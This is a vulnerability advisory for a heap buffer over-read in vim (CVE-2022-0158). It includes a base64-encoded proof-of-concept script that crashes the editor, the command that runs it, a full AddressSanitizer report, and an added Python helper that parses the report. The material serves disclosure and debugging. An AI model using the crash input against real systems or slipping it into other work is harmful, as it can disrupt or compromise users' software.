Headline
CVE-2022-0158: Heap-based Buffer Overflow in vim
vim is vulnerable to Heap-based Buffer Overflow
Description
A heap-based buffer overflow has been found in vim at commit 2f0936c. The ASan report below shows a 5-byte read by strlen that starts one byte before the beginning of a 4-byte heap allocation.
Proof of Concept
PoC (base64-encoded; decode it to a file named poc before running the command below):
ZGVmIEZpcnN0RnVuY3Rpb24oKQogIGRlZiBTZWNvbmRGdW5vbmUKJCAgCiAgIGVuZGRCQkJCCmVu
ZGRlZgojIEN/////bGUgYWxsZWZ8QkJCQgplbmRkZWYKIyBDb21waWxlIGFsbCBmdW5jdGlvbnMK
ZGVmY29tcGlsZQo=
~/fuzzing/vim/fuzz/bin/vim -u NONE -X -Z -e -s -S ./poc -c :qa!
ASan stack trace:
=================================================================
==836524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000622f at pc 0x0000004306f9 bp 0x7ffc883006f0 sp 0x7ffc882ffeb0
READ of size 5 at 0x60200000622f thread T0
#0 0x4306f8 in strlen (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8)
#1 0xc444a6 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xc444a6)
#2 0xf7515a (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf7515a)
#3 0xe1ba91 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe1ba91)
#4 0xe14ca4 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14ca4)
#5 0xe14009 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe14009)
#6 0xe12ddf (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12ddf)
#7 0xe12043 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe12043)
#8 0xe0e863 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0e863)
#9 0xe0ffaa (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xe0ffaa)
#10 0xdaf709 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdaf709)
#11 0xdc68ed (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xdc68ed)
#12 0xd92167 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xd92167)
#13 0x6e68fe (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
#14 0x6d9b41 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
#15 0xb6680a (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6680a)
#16 0xb6457f (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xb6457f)
#17 0x6e68fe (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6e68fe)
#18 0x6d9b41 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x6d9b41)
#19 0xf60f43 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf60f43)
#20 0xf5d76f (/home/aidai/fuzzing/vim/fuzz/bin/vim+0xf5d76f)
#21 0x7f0d3f15a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#22 0x41dacd (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x41dacd)
0x60200000622f is located 1 bytes to the left of 4-byte region [0x602000006230,0x602000006234)
allocated by thread T0 here:
#0 0x49620d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49620d)
#1 0x4c5d15 (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d15)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8) in strlen
Shadow bytes around the buggy address:
0x0c047fff8bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8c00: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa 06 fa
0x0c047fff8c10: fa fa 00 01 fa fa fd fd fa fa fd fd fa fa 04 fa
0x0c047fff8c20: fa fa 00 04 fa fa fd fd fa fa 00 03 fa fa fd fd
0x0c047fff8c30: fa fa 00 03 fa fa fd fd fa fa 00 03 fa fa 00 06
=>0x0c047fff8c40: fa fa 00 05 fa[fa]04 fa fa fa fa fa fa fa fa fa
0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==836524==ABORTING
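The report above carries everything needed to locate the fault without a symbolised binary: the access size, the faulting address, the allocation it misses and the shadow bytes around it. The following Python script is an added triage helper, not part of the advisory or of vim. It parses the report lines quoted above, computes the offset of the access relative to the allocation, and cross-checks the faulting address against the shadow dump using ASan's default x86_64 Linux mapping (shadow = (addr >> 3) + 0x7fff8000, an assumption about the build that produced this report). The report text is embedded so the script runs offline.

```python
import re

# ASan report lines from the advisory above (trimmed to the parts the parser needs).
ASAN_REPORT = """\
==836524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000622f at pc 0x0000004306f9 bp 0x7ffc883006f0 sp 0x7ffc882ffeb0
READ of size 5 at 0x60200000622f thread T0
    #0 0x4306f8 in strlen (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8)
0x60200000622f is located 1 bytes to the left of 4-byte region [0x602000006230,0x602000006234)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4306f8) in strlen
Shadow bytes around the buggy address:
  0x0c047fff8c30: fa fa 00 03 fa fa fd fd fa fa 00 03 fa fa 00 06
=>0x0c047fff8c40: fa fa 00 05 fa[fa]04 fa fa fa fa fa fa fa fa fa
  0x0c047fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
"""

# Default shadow mapping on x86_64 Linux: shadow = (addr >> 3) + 0x7fff8000.
# Assumption: the report came from such a build (the stack addresses 0x7ffc... suggest it).
SHADOW_SCALE = 3
SHADOW_OFFSET = 0x7FFF8000

# Subset of the shadow byte legend that ASan prints at the end of every report.
SHADOW_LEGEND = {
    "00": "addressable", "fa": "heap left redzone", "fd": "freed heap region",
    "f1": "stack left redzone", "f2": "stack mid redzone", "f3": "stack right redzone",
    "f9": "global redzone",
}

ERROR_RE = re.compile(r"AddressSanitizer: (?P<kind>[\w-]+) on address 0x(?P<addr>[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at 0x(?P<addr>[0-9a-f]+)", re.M)
REGION_RE = re.compile(
    r"is located (?P<dist>\d+) bytes to the (?P<side>left|right) of "
    r"(?P<rsize>\d+)-byte region \[0x(?P<lo>[0-9a-f]+),0x(?P<hi>[0-9a-f]+)\)")
SHADOW_ROW_RE = re.compile(r"^(?:=>)?\s*0x(?P<row>[0-9a-f]+):(?P<cells>.*)$", re.M)


def shadow_address(addr):
    """Map an application address to the address of the shadow byte that covers it."""
    return (addr >> SHADOW_SCALE) + SHADOW_OFFSET


def parse_shadow_rows(report):
    """Return {row_base: [16 shadow bytes]} from the 'Shadow bytes' dump; the '[fa]' marker is tolerated."""
    rows = {}
    for m in SHADOW_ROW_RE.finditer(report):
        cells = re.findall(r"[0-9a-f]{2}", m.group("cells"))
        if len(cells) == 16:
            rows[int(m.group("row"), 16)] = cells
    return rows


def shadow_byte(rows, addr):
    """Shadow byte covering `addr` according to the parsed dump, or None if that row was not printed."""
    s = shadow_address(addr)
    row = rows.get(s & ~0xF)
    return row[s & 0xF] if row else None


def describe_shadow(value):
    """Translate a shadow byte into the legend's wording."""
    if value in SHADOW_LEGEND:
        return SHADOW_LEGEND[value]
    if value is not None and 1 <= int(value, 16) <= 7:
        return f"partially addressable ({int(value, 16)} of 8 bytes)"
    return "unknown"


def triage(report):
    """Summarise an ASan heap report: what was accessed, where it sits relative to the allocation,
    and whether the shadow dump agrees with the distance ASan printed."""
    err, acc, reg = ERROR_RE.search(report), ACCESS_RE.search(report), REGION_RE.search(report)
    if not (err and acc and reg):
        raise ValueError("not a recognised ASan heap report")
    addr, size = int(acc["addr"], 16), int(acc["size"])
    lo, hi = int(reg["lo"], 16), int(reg["hi"], 16)
    rows = parse_shadow_rows(report)
    # Bytes of the access that fall outside [lo, hi): before the start plus past the end.
    outside = max(0, lo - addr) + max(0, addr + size - hi)
    return {
        "kind": err["kind"], "op": acc["op"], "size": size,
        "offset": addr - lo,            # negative means the access starts before the allocation
        "outside_bytes": outside,
        "region_size": hi - lo,
        "shadow_at_addr": shadow_byte(rows, addr),
        "shadow_at_region_start": shadow_byte(rows, lo),
        "consistent": int(reg["dist"]) == (lo - addr if reg["side"] == "left" else addr - hi),
    }


if __name__ == "__main__":
    t = triage(ASAN_REPORT)
    for k, v in t.items():
        print(f"{k}: {v}")
    print("shadow at faulting address:", describe_shadow(t["shadow_at_addr"]))
    print("shadow at region start:", describe_shadow(t["shadow_at_region_start"]))
```

For this report the script resolves the faulting address to shadow byte 5 of row 0x0c047fff8c40 (the byte ASan bracketed, a heap left redzone) and the region start to byte 6 (04, a 4-byte partially addressable granule), confirming that the 5-byte strlen read covers exactly one redzone byte plus the whole allocation. A negative offset with a consistent shadow check is the signature of a pointer that was walked backwards past the start of its buffer rather than a classic overrun past the end, which is the first thing to look for in the source around the top unsymbolised frames.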